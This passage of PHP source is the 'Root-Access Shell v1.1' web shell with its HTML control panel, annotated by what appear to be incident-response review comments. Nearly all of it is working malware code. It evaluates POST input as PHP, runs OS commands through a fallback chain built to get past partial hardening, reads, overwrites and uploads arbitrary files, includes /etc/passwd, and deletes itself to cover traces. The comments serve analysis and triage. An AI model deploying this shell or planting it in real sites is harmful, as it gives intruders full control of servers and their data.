// shell_exec, then popen. Because of this fallback chain, a hardening setup
// that restricts only some of these five functions does not stop the helper.
// $in is passed through unchanged; callers supply request data to it.
};function ex($in){
$out = '';
// exec() fills $out with an array of output lines, which is joined with "\n".
// passthru() and system() write directly to output, so they are captured with
// an output buffer that is read and then discarded.
if(function_exists('exec')){exec($in,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($in);$out = ob_get_contents();ob_end_clean();}
elseif(function_exists('system')){ob_start();system($in);$out = ob_get_contents();ob_end_clean();}
elseif(function_exists('shell_exec')){$out = shell_exec($in);}
// Last resort: read the child's stdout from a popen() pipe in 1024-byte chunks.
elseif(is_resource($f = popen($in,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}
pclose($f);}
return $out;}
// Main request dispatcher, selected by the POST field 'type'. The POST field
// 'value' is used after stripslashes() only; nothing else validates it.
//   1     - value is evaluated as PHP code
//   2     - value is run as an OS command via ex(), output printed with print_r
//   3     - directory listing ('ls -la', falling back to 'dir')
//   4     - prints the contents of the file named by value (HTML-escaped) and
//           remembers that path in the session for a later save
//   5     - writes value into the file remembered by request type 4
//   6     - stores an uploaded file in the directory returned by pwd()
//   other - directory listing, same as the non-safe-mode path of type 3
// Returns the listing string for the listing branches, the "File doesn't
// exists!" message for a missing file in type 4, and null otherwise. Types 1,
// 2 and 4 write their output directly instead of returning it.
// For triage, these handlers correspond to POST bodies carrying 'type' and
// 'value' sent to the script's own URL (every form uses an empty action).
function shell()
{if($_POST['type']==1){eval(stripslashes($_POST['value']));}elseif($_POST['type']==2){pwd();print_r(ex(stripslashes($_POST['value'])));}
// Listing branch: uses safe_ex() when the session flag set by safe_mode() is 1.
elseif($_POST['type']==3){if($_SESSION['safe_mode'] == 1){if(($u=safe_ex('ls -la'))!='')
{return $u;}else{return safe_ex('dir');};}else{if(($u=ex('ls -la'))!=''){return $u;}else{return ex('dir');};}}
elseif($_POST['type']==4){
if(file_exists(stripslashes($_POST['value']))){
// $safe_mode is not defined in this function, so this comparison is always
// true and the safe_read() branch below is not reached from here.
// NOTE(review): "rw" is not one of fopen()'s documented modes; presumably it
// behaves as a plain read - confirm.
if($safe_mode!=1){echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
}else{echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));};
// Marks the session so edit() renders a Save button and type 5 knows the target.
$_SESSION['edit']=1;
$_SESSION['filename'] = $_POST['value'];}else{return 'File doesn\'t exists!';}}
// Overwrites the remembered file with the submitted text; handles are not closed.
elseif($_POST['type']==5){fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));}
// Upload: the target name is 'newname' if given, else the client's file name;
// it is appended to pwd() without any sanitising or extension check.
elseif($_POST['type']==6){$uploaddir = pwd();if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);}
else{$u = ex('ls -la');if($u == ''){return ex('dir');}else{return $u;};}
return null;};
// Returns the HTML for a "Save" submit button when $_SESSION['edit'] is 1
// (set by request type 4 in shell()) and resets the flag to 0; otherwise
// returns nothing.
function edit()
{if ($_SESSION['edit'] == 1){$_SESSION['edit']=0;return "<br><center><input type=submit value=\"Save\"></center>";};}
// Returns the operating system name, release and version from php_uname(),
// separated by single spaces, for display in the "Server Info" table.
function getsystem()
{return php_uname('s')." ".php_uname('r')." ".php_uname('v');};
// Returns the SERVER_SOFTWARE environment variable (the web server banner).
function getserver()
{return getenv("SERVER_SOFTWARE");};
// Returns a description of the account the script runs under.
// Starts from get_current_user(); unless that is "SYSTEM", it runs the 'id'
// command through ex() and uses its output, falling back to a string built
// from getmyuid(), get_current_user() and getmygid() when 'id' yields nothing.
function getuser()
{$out = get_current_user();
if($out!="SYSTEM"){if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};}
return $out;};
// pwd: changes into the directory stored in $_SESSION['pwd'] and returns the
// resulting working directory with a trailing separator.
// On request type 3 the session value is first replaced with the client-supplied
// $_POST['value'] (stripslashes only), so the client chooses the directory.
// Returns nothing when the path contains no '/' or '\\' beyond index 0,
// because strrpos() then yields 0 or false and both branches are skipped.
function pwd()
{if($_POST['type']==3){$_SESSION['pwd'] = stripslashes($_POST['value']);}
chdir($_SESSION['pwd']);
$cwd = getcwd();
if($u=strrpos($cwd,'/'))
{if($u!=strlen($cwd)-1){return $cwd.'/';}else{return $cwd;};}
elseif($u=strrpos($cwd,'\\'))
{if($u!=strlen($cwd)-1){return $cwd.'\\';}else{return $cwd;};};
// safe_ex: fallback directory lister used when command execution is unavailable.
// The content of $in is ignored apart from a truthiness test; the function
// always lists the current directory through dir('.') and stat(), echoing one
// line per entry. It has no return statement, so callers comparing its result
// with '' always see an empty value.
// NOTE(review): safe_read() is declared inside this function body, so a second
// call to safe_ex() in one request would presumably fail with a redeclaration
// error - shell() calls it twice on its safe-mode path. Confirm.
}function safe_ex($in){
if($in){$d=dir('.');
while (false!==($file=$d->read())){
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
// $unix is never assigned in this function, so only the first branch runs:
// modification time, then either a <DIR> marker or the size.
if(!$unix){
echo date("d.m.Y H:i",$mtime)." ";
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
// The else branch calls perms(), which is not defined in the visible source.
}else{$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);}
echo "$file\n";}
$d->close();}
// safe_read: echoes the safe_mode and open_basedir ini values, includes
// /etc/passwd, restores both ini settings, echoes them again, then calls
// file_get_contents($in) and discards the result. It returns nothing, so it
// does not actually hand back the requested file's contents.
function safe_read($in)
{echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
file_get_contents($in);}
// Self-removal: a GET request with kill=done deletes this script from disk and
// emits a JavaScript alert. For incident response this means a missing file
// does not rule out earlier use; web access logs and file-system timestamps
// remain the evidence to check.
}if($_GET['kill']=='done'){
unlink($_SERVER['SCRIPT_FILENAME']);
echo "<script>alert('Your shell script was succefully deleted!')</script>";}?>
<html><head><title>Root-Access Shell</title><META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script></head><body bgcolor='#242629'><br><center><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Server Info</b></font></th></tr><tr><td class=contentb><table border="0" width="100%"><tr><td width="35%" >System: <font size=1 color=#ff4500><?php echo getsystem();?></font></td>
<td width="15%" >PHP-version: <font size=1 color=#29a329><?php echo phpversion();?></font></td>
<td width="15%" >Oracle: <?php echo oracle();?></td><td width="25%" >Safe_mode: <?php echo safe_mode();?></td></tr><tr>
<td width="35%" >Server: <font size=1 color=#ff4500><?php echo getserver();?></font></td>
<td width="15%" >MySQL: <?php echo testmysql();?></td><td width="15%" >cURL: <?php echo testcurl();?></td><td width="25%" >Total space: <?php echo view_size(disk_total_space(getcwd()));?></td></tr><tr>
<td width="35%" >PWD: <font size=1 color=#ff4500><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></font></td>
<td width="15%" >PostgreSQL: <?php echo postgresql();?></td><td width="15%" >WGet: <?php echo testwget();?></td><td width="25%" >Free space: <?php echo view_size(diskfreespace(getcwd()));?></td></tr><tr>
<td width="35%" >User: <font size=1 color=#ff4500><?php echo getuser();?></font></td>
<td width="15%" >MSSQL: <?php echo testmssql();?></td><td width="15%" >Perl: <?php echo testperl();?></td>
<td width="25%" >Server time: <?php echo date('H:i d-m-Y');?></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Shell</b> <a onclick='kill()'><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class=contentb><center><form action method=POST><input type=hidden name="type" value=5><textarea cols=150 rows=20 name="value"><?php echo htmlspecialchars(shell());?></textarea><?php echo edit();?></form><table border="0" width="100%"><tr><td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b><input type=hidden name="type" value=2><input type=text name="value" size=45><input type=submit value="Enter">
</form></td><td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php echo pwd();?>><input type=hidden name="type" value=3><input type=submit value="Enter">
</form></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Tools</b></font></th></tr>
<tr><td class=contentb><table border="0" width="100%"><tr><td width="50%"><form action method=POST><b>Edit file:</b><input type=hidden name="type" value=4>
<input type=text name="value" size=52 value=<?php echo pwd();?>><input type=submit value="Edit"></form></td>
<td width="50%"><form action method=POST><b>Download:</b><input type=hidden name="type" value=11><input type=text name="value" size=51 value=<?php echo pwd();?>><input type=submit value="Download">
</form></td></tr><tr><td width="50%"><form action method=POST><b>Run PHP Code:</b>
<input type=hidden name="type" value=1><textarea rows=5 cols=46 name="value"><?php echo 'echo "Root-Access Shell";';?></textarea><input type=submit value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action method=POST><b>Upload:</b><input type=hidden name="type" value=6>
<input type=file name="userfile" size=40><br><input type=hidden name="type" value=6><b>New name:</b><input type=text size=37 name="newname"><input type=submit value="Upload">
</form></td> </tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Copyright</b></font></th></tr>
<tr><td class=contentb><center><a href="http://forum.root-access.ru"><font size=2 color=#e7e7eb>Root-Access Shell v1.1</font></a></center>
</td></tr></table><br></center></body></html>
<p align="center"><b><font size="4" color="#800000"></font></b></p>